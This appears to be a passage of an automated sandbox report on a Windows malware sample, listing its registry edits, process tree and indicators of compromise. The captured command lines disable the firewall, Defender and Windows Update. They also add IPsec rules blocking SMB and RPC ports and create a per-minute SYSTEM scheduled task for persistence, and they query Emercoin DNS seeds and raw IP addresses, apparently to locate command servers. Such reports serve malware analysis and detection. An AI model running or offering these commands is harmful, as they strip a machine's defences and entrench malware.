\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-e9-62-78-c7-6c\WpadDecisionTime = 90bcdbecb250db01 bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{48BE3D07-CE27-44FD-83B0-B520ADC97E7F}\WpadDecisionReason = "1" bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-e9-62-78-c7-6c\WpadDecisionReason = "1" bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bcvnbib.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{48BE3D07-CE27-44FD-83B0-B520ADC97E7F}\8e-e9-62-78-c7-6c bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-e9-62-78-c7-6c\WpadDecision = "0" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections bcvnbib.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-e9-62-78-c7-6c bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{48BE3D07-CE27-44FD-83B0-B520ADC97E7F}\WpadNetworkName = "Network 3" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{48BE3D07-CE27-44FD-83B0-B520ADC97E7F} bcvnbib.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{48BE3D07-CE27-44FD-83B0-B520ADC97E7F}\WpadDecisionTime = 90bcdbecb250db01 bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{48BE3D07-CE27-44FD-83B0-B520ADC97E7F}\WpadDecision = "0" bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings bcvnbib.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" bcvnbib.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bcvnbib.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2928 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 264 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs
pid Process 1204 bcvnbib.exe 1428 bcvnbib.exe 2436 bcvnbib.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2608 jxhsmecnfsqhiqy9821.exe 2812 bcvnbib.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe Token: SeDebugPrivilege 2768 bcvnbib.exe Token: SeDebugPrivilege 2812 bcvnbib.exe Token: SeAuditPrivilege 1400 svchost.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 1052 hentai.exe 2952 kkmiuy.exe 2768 bcvnbib.exe 2720 hentai.exe 2812 bcvnbib.exe 2568 hentai.exe 2608 jxhsmecnfsqhiqy9821.exe 1204 bcvnbib.exe 576 hentai.exe 1428 bcvnbib.exe 1396 hentai.exe 2436 bcvnbib.exe 2580 hentai.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2356 wrote to memory of 1052 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 31 PID 2356 wrote to memory of 1052 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 31 PID 2356 wrote to memory of 1052 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 31 PID 2356 wrote to memory of 1052 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 31 PID 2356 wrote to memory of 2912 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 32 PID 2356 wrote to memory of 2912 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 32 PID 2356 wrote to memory of 2912 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 32 PID 2356 wrote to memory of 2912 2356 3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe 32 PID 2912 wrote to memory of 2928 2912 cmd.exe 34 PID 2912 wrote to memory of 2928 2912 cmd.exe 34 PID 2912 wrote to memory of 2928 2912 cmd.exe 34 PID 2912 wrote to memory of 2928 2912 cmd.exe 34 PID 2912 wrote to memory of 2768 2912 cmd.exe 36 PID 2912 wrote to memory of 2768 2912 cmd.exe 36 PID 2912 wrote to memory of 2768 2912 cmd.exe 36 PID 2912 wrote to memory of 2768 2912 cmd.exe 36 PID 2768 wrote to memory of 2720 2768 bcvnbib.exe 37 PID 2768 wrote to memory of 2720 2768 bcvnbib.exe 37 PID 2768 wrote to memory of 2720 2768 bcvnbib.exe 37 PID 2768 wrote to memory of 2720 2768 bcvnbib.exe 37 PID 2812 wrote to memory of 2568 2812 bcvnbib.exe 39 PID 2812 wrote to memory of 2568 2812 bcvnbib.exe 39 PID 2812 wrote to memory of 2568 2812 bcvnbib.exe 39 PID 2812 wrote to memory of 2568 2812 bcvnbib.exe 39 PID 2812 wrote to memory of 2608 2812 bcvnbib.exe 40 PID 2812 wrote to memory of 2608 2812 bcvnbib.exe 40 PID 2812 wrote to memory of 2608 2812 bcvnbib.exe 40 PID 2812 wrote to memory of 2608 2812 bcvnbib.exe 40 PID 2812 wrote to memory of 2320 2812 bcvnbib.exe 41 PID 2812 wrote to memory of 2320 2812 bcvnbib.exe 41 PID 2812 wrote to memory of 2320 2812 bcvnbib.exe 41 PID 2812 wrote to memory of 2320 2812 bcvnbib.exe 41 PID 2812 wrote to memory of 1604 2812 bcvnbib.exe 43 PID 2812 wrote to memory of 1604 2812 bcvnbib.exe 43 PID 2812 wrote to memory of 1604 2812 bcvnbib.exe 43 PID 2812 wrote to memory of 1604 2812 bcvnbib.exe 43 PID 2812 wrote to memory of 1316 2812 bcvnbib.exe 45 PID 2812 wrote to memory of 1316 2812 bcvnbib.exe 45 PID 2812 wrote to memory of 1316 2812 bcvnbib.exe 45 PID 2812 wrote to memory of 1316 2812 bcvnbib.exe 45 PID 2812 wrote to memory of 768 2812 bcvnbib.exe 47 PID 2812 wrote to memory of 768 2812 bcvnbib.exe 47 PID 2812 wrote to memory of 768 2812 bcvnbib.exe 47 PID 2812 wrote to memory of 768 2812 bcvnbib.exe 47 PID 768 wrote to memory of 1692 768 cmd.exe 49 PID 768 wrote to memory of 1692 768 cmd.exe 49 PID 768 wrote to memory of 1692 768 cmd.exe 49 PID 768 wrote to memory of 1692 768 cmd.exe 49 PID 768 wrote to memory of 264 768 cmd.exe 50 PID 768 wrote to memory of 264 768 cmd.exe 50 PID 768 wrote to memory of 264 768 cmd.exe 50 PID 768 wrote to memory of 264 768 cmd.exe 50 PID 2812 wrote to memory of 536 2812 bcvnbib.exe 51 PID 2812 wrote to memory of 536 2812 bcvnbib.exe 51 PID 2812 wrote to memory of 536 2812 bcvnbib.exe 51 PID 2812 wrote to memory of 536 2812 bcvnbib.exe 51 PID 2812 wrote to memory of 2096 2812 bcvnbib.exe 53 PID 2812 wrote to memory of 2096 2812 bcvnbib.exe 53 PID 2812 wrote to memory of 2096 2812 bcvnbib.exe 53 PID 2812 wrote to memory of 2096 2812 bcvnbib.exe 53 PID 2812 wrote to memory of 2252 2812 bcvnbib.exe 55 PID 2812 wrote to memory of 2252 2812 bcvnbib.exe 55 PID 2812 wrote to memory of 2252 2812 bcvnbib.exe 55 PID 2812 wrote to memory of 2252 2812 bcvnbib.exe 55
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe"C:\Users\Admin\AppData\Local\Temp\3ac9df21dbbfa0393f84867ee92aa74aa4b886de6fc08e4b251e91148dfb673f.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\hentai.exeC:\Users\Admin\AppData\Local\Temp\hentai.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1052
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gbmitiih\bcvnbib.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2928
-
-
C:\Windows\gbmitiih\bcvnbib.exeC:\Windows\gbmitiih\bcvnbib.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Users\Admin\AppData\Local\Temp\hentai.exeC:\Users\Admin\AppData\Local\Temp\hentai.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2720
-
-
-
-
C:\Windows\SysWOW64\kkmiuy.exeC:\Windows\SysWOW64\kkmiuy.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2952
-
C:\Windows\gbmitiih\bcvnbib.exeC:\Windows\gbmitiih\bcvnbib.exe1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Indicator Removal: Clear Persistence
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\TEMP\hentai.exeC:\Windows\TEMP\hentai.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2568
-
-
C:\Windows\gbmitiih\jxhsmecnfsqhiqy9821.exeC:\Windows\gbmitiih\jxhsmecnfsqhiqy9821.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2608
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete all2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2320
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1604
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1316
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "itfiythrf" /ru system /tr "cmd /c C:\Windows\Fonts\bcvnbib.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "itfiythrf" /ru system /tr "cmd /c C:\Windows\Fonts\bcvnbib.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:264
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:536
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2096
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2252
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2516
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:972
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1480
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:788
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1124
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2084
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3020
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:2256 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:2056 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1852
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:2164
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:2908 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:2644
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:2412
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:2692 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:824 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:2712
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2120 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2948 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2688
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1952 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin seed1.emercoin.com2⤵
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin seed1.emercoin.com3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin seed2.emercoin.com2⤵
- System Location Discovery: System Language Discovery
PID:1740 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin seed2.emercoin.com3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 161.97.219.842⤵PID:1972
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 161.97.219.843⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 163.172.168.1712⤵PID:2708
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 163.172.168.1713⤵
- System Location Discovery: System Language Discovery
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 94.103.153.1762⤵PID:2800
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 94.103.153.1763⤵
- System Location Discovery: System Language Discovery
PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 207.192.71.132⤵
- System Location Discovery: System Language Discovery
PID:376 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 207.192.71.133⤵
- System Location Discovery: System Language Discovery
PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 178.63.116.1522⤵
- System Location Discovery: System Language Discovery
PID:1640 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 178.63.116.1523⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 51.77.227.842⤵
- System Location Discovery: System Language Discovery
PID:1264 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 51.77.227.843⤵
- System Location Discovery: System Language Discovery
PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 188.226.146.1362⤵
- System Location Discovery: System Language Discovery
PID:2868 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 188.226.146.1363⤵PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c nslookup -qt=A 0x00x1.coin 51.75.173.1772⤵PID:1852
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=A 0x00x1.coin 51.75.173.1773⤵
- System Location Discovery: System Language Discovery
PID:2396
-
-
-
